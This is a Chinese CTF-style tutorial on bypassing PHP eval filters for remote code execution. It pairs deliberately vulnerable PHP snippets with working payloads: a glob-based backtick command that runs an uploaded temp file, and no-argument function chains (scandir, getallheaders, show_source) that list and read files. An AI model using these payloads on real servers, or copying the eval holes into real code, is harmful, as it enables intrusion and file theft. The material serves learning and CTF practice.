目录
利用临时文件与linux正则glob语句来实现rce;
模拟代码限制:
<?php
if(isset($_GET['code'])){
$code = $_GET['code'];
if(strlen($code)>35){
die("Long.");
}
if(preg_match("/[A-Za-z0-9_$]+/",$code)){
die("NO.");
}
eval($code);
}else{
highlight_file(__FILE__);
}
#文件上传:
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="web.php"method="post" enctype="multipart/form-data">
<input type="file" name="file" id="">
<input type="submit" value="submit">
</form>
</body>
</html>
步骤:
利用burp截取传入文件产生的content-type与内容,复制到抓取限制模拟代码的包中,然后post数据 code=?><?`.+/???/????????[@-[]`;?> , [@-[]是glob语句,代表大写字母,在asc码中大写字母的asc码值在@到[之间。
无参数的rce:
<?php
highlight_file(__FILE__);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);
}
?>
分析,解答:
首先分析正则意思:
[^\W] : [^]是反选的意思,\W是指特殊字符除了_ .那么合并起来加上匹配字母、数字和下划线。
((?R)?):就是()以及里面的递归
那么总体就是一个函数的意思,例如ab(acb());就可以匹配。 (目标是读一个flag)
那么可以先读取有哪些文件名,使用print_r(scandir(current(localeconv())));,pos是current的别名 ,还可以用print_r(scandir(getcwd()));输出当前文件夹所有文件名。(current(localeconv())其实就是获取了一个. )。
之后对其进行抓包,然后在合适位置添加 随意:flag.txt来确定抓的文件,可以先通过code=print_r(end(getallheaders()));
看到的是 127.0.0.1:8080
,这通常意味着 end(getallheaders())
返回的是 HTTP 请求头数组中的最后一个元素的值,而这个值恰好是 Host
头的值(即 127.0.0.1:8080
)。这可能是回环访问的问题。头尾进行了调换。
也可以使用:code=show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
不断的刷新,就会随机取得flag。
array_flip : 交换数组中的键和值
array_rand : 从数组中取出一个或多个随机键
目录